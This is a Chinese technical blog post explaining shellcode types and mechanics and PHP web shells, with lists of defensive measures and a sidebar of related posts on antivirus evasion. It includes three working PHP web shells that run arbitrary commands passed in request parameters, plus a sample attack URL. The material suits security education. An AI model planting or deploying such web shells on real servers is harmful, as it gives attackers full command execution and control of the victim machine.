Shellcode详解

已于 2024-06-18 21:19:57 修改
阅读量1.4k 收藏 13
点赞数 42
分类专栏: 信息安全 文章标签: shellcode php
于 2024-06-18 21:15:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ARV000/article/details/139783517
版权

Shellcode详解


Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。

一、Shellcode的特点

  1. 紧凑性:Shellcode通常非常小,以便于在有限的空间内注入目标进程。
  2. 自包含:Shellcode包含了所有必需的代码和数据,能够在目标系统中独立运行。
  3. 位置无关:许多shellcode设计为位置无关代码(Position-Independent Code, PIC),以便能够在内存中的任何位置执行。

二、Shellcode的类型

  1. 本地shellcode:针对本地漏洞编写,通常直接在受害者机器上执行。
  2. 远程shellcode:用于远程漏洞攻击,通过网络传输并在远程系统上执行。
  3. 绑定shell shellcode:在受害者机器上启动一个监听端口,攻击者可以连接并获得一个命令行shell。
  4. 反向shell shellcode:从受害者机器连接到攻击者的机器,攻击者通过这个连接控制受害者系统。
  5. 下载器shellcode:下载并执行其他恶意代码。

三、Shellcode的工作原理

  1. 发现漏洞:攻击者找到软件中的漏洞,通常是缓冲区溢出、格式化字符串漏洞等。
  2. 代码注入:攻击者将shellcode注入目标进程的内存中。
  3. 代码执行:利用漏洞使目标进程的控制流跳转到shellcode位置,从而执行shellcode。

四、防御措施

  1. 输入验证和清理:确保应用程序正确处理所有输入数据,避免缓冲区溢出等常见漏洞。
  2. 地址空间布局随机化(ASLR):随机化进程地址空间布局,增加攻击难度。
  3. 数据执行保护(DEP):防止数据段执行代码,阻止shellcode的执行。
  4. 使用最新的安全补丁:保持系统和软件更新,修补已知漏洞。

在PHP中,shellcode通常不是直接使用机器代码,而是通过PHP代码执行系统命令或注入恶意代码。这类PHP脚本被称为“web shell”或“PHP web shell”。PHP shellcode的主要目标是通过漏洞在服务器上执行任意命令、访问文件系统、获取敏感信息或控制服务器。

五、常见的PHP Web Shell示例

5.1 简单的命令执行

一个非常简单的PHP web shell,通过用户输入执行系统命令:

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

访问方式:

http://target.com/shell.php?cmd=ls

5.2 更复杂的Web Shell

一个功能更为完善的PHP web shell,提供文件浏览、命令执行等功能:

<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
<html>
<body>
    <form method="get">
        <input type="text" name="cmd" placeholder="Enter command">
        <input type="submit" value="Execute">
    </form>
</body>
</html>

5.3 防御措施

为了防止PHP web shell的攻击,以下是一些防御措施:

  1. 输入验证和清理:严格验证和清理用户输入,避免直接使用未经处理的数据。
  2. 禁用危险函数:在PHP配置中禁用如systemexecshell_execpassthru等可能执行系统命令的函数。
  3. 使用最小权限原则:确保Web服务器运行在最小权限的用户下,限制文件和目录的访问权限。
  4. 安全配置Web服务器:配置Web服务器以最小化攻击面,使用安全的文件和目录权限。
  5. 定期扫描和监控:定期扫描网站和服务器,查找和删除潜在的恶意文件或代码。
  6. 保持软件更新:定期更新Web应用程序、PHP和服务器软件,修补已知漏洞。

5.4 实际案例

以下是一个实际的PHP Web Shell代码示例,它具有文件管理、命令执行等功能:

<?php
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    $output = shell_exec($cmd);
    echo "<pre>$output</pre>";
}
?>
<html>
<head>
    <title>PHP Web Shell</title>
</head>
<body>
    <h1>PHP Web Shell</h1>
    <form method="get">
        <input type="text" name="cmd" placeholder="Enter command">
        <input type="submit" value="Execute">
    </form>
    <?php
    if (isset($_GET['dir'])) {
        $dir = $_GET['dir'];
        $files = scandir($dir);
        echo "<h2>Directory listing for $dir</h2>";
        echo "<ul>";
        foreach ($files as $file) {
            echo "<li>$file</li>";
        }
        echo "</ul>";
    }
    ?>
    <form method="get">
        <input type="text" name="dir" placeholder="Enter directory">
        <input type="submit" value="List Directory">
    </form>
</body>
</html>

这种PHP Web Shell的功能包括执行任意命令和浏览服务器上的文件系统。攻击者可以通过这些功能进一步控制和利用受害服务器。为了防止此类攻击,务必采用上述防御措施。

N阶二进制
关注
  • 42
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Shellcode
weixin_43916678的博客
07-07 8936
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
通过Python实现Payload分离免杀过程详解
01-19
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x
免杀入门---shellcode免杀
LvHLong的博客
05-03 5469
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8956
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1235
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
shellCode免杀技巧
qq_39330735的博客
05-15 2292
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
MemLoad2Shellcode.rar
06-30
Shellcode框架与内存加载技术详解Shellcode,一种在计算机安全领域中常见的恶意代码,通常被用于绕过安全机制,直接在目标系统内存中执行。它是一种机器码,可以直接由CPU执行,无需经过解释器或编译器。本文...
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少...
Python库 | shellcode-0.1.2.tar.gz
03-10
**Python库shellcode-0.1.2的详解** 在Python的世界里,库扮演着至关重要的角色,它们提供了丰富的功能,让开发者能够高效地编写代码。`shellcode-0.1.2`是一个Python库,专门用于处理和操作ShellcodeShellcode是...
L9-3-2021必做-overflow-to-shellcode1
08-03
【知识点详解】 本知识点主要涉及的是栈溢出漏洞利用的基础概念和实践,通过北京理工大学的网络信息安全课程中的一个练习来讲解。栈溢出是由于程序处理数据时,超过了栈分配的空间,导致数据溢出到栈上的其他内存...
shellcode编程揭秘
03-04
教你怎么写shellcode,很好的shellcode编程范例,从稳定性到安全性都有讲
Fiber_Injection:使用Windows Fibers在本地进程中执行Shellcode的简单工具
03-21
《使用Windows Fibers执行Shellcode:Fiber_Injection工具详解》 Windows Fibers是一种轻量级线程的概念,它允许在同一进程中切换不同的执行路径,而无需进行完整的上下文切换。这种技术在某些特定的场景下,如I/O...
shellcode
赵花花08042的博客
01-28 4111
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
网络攻防技术——shellcode编写
学习记录
02-27 3189
一、题目 shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode,但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的技术。本实验室的目的是帮助学生理解这些技术,以便他们能够编写自己的shellcode。 编写shellcode有几个挑战,一个是确保二进制文件中没有0x00,另一个是找出命令中使用的数据的地址。第一个挑战不是很难解决,有几种方法可以解决它。第二个挑战
Shellcode编码技术
2301_77498991的博客
04-28 725
也就是我们在执行真正的costom_decoder之前将esp调整到nSEH之前,和costom_decoder本身之前,留下足够的opcode空间。因此,我们用0减去re_opcode,就可以得到opcode,为什么用减法而不是加法直接得到opecode呢,以eax为例,sub eax, xx指令是‘\x2d'合法的,而add eax, xx是”\x81\xC0“。为了更好的确定地址,我们将egg hunter放在payload的首,在nSEH处跳到调整edx的代码。所以egg hunter是可行的。
什么是shellcode
qq_44833342的博客
05-29 918
例如病毒、蠕虫、木马等。一旦成功执行,Shellcode可以允许攻击者执行任意操作,例如获取系统权限、窃取敏感数据、修改文件、控制网络连接等。Shellcode是一段二进制代码,通常用于利用计算机系统中的漏洞,以便攻击者能够在系统上执行任意代码。Shellcode通常是以二进制形式编写的,因此可以直接在内存中执行。Shellcode通常被嵌入到攻击者设计的恶意软件中。,而不需要先将其编译成可执行文件。
免杀专题(一)shellcode原理
weixin_47224111的博客
12-30 3802
免杀专题(一)shellcode原理 基本概念 一段16进制的机器码,可在暂存器eip溢出后,塞入一段可让cpu执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 原理 因为shellcode一般为一段汇编代码,不依赖任何编译环境,也不能像编写代码一样,调用api函数名称来实现功能。它通过主动查找dll基址并动态获取api地址的方式来实现api调用。 Kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理。 shellcode分为两个模块,基本模块和功能模块 基本模块 用
Shell Code:黑客攻击的“利器”
最新发布
Saki_Python的博客
02-07 1773
Shell Code(外壳代码)是黑客攻击中的一个重要组成部分,它是一小段代码,作为利用软件漏洞的有效载荷。Shell Code不是程序,而是自包含的代码。实际上,它们应该在没有上下文的情况下运行。
ShellCode —— 入门
LYSM
07-22 4090
原理 简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。 具体注意: 使用 API 时应该动态调用(GetProAddress) 不能使用全局变量,或者用 static 修饰的变量 在 shellcode 工程中要自定义入口函数 确保调用 API 之前都已经加载了与之对应的 DLL 所有的字符串都要用字符串数组的方式代替 环境搭建 首先新建一个项目,这里我推荐 空项目,之后创建一个 main.cpp 文件: 使用 Release 模式写

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

N阶二进制

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值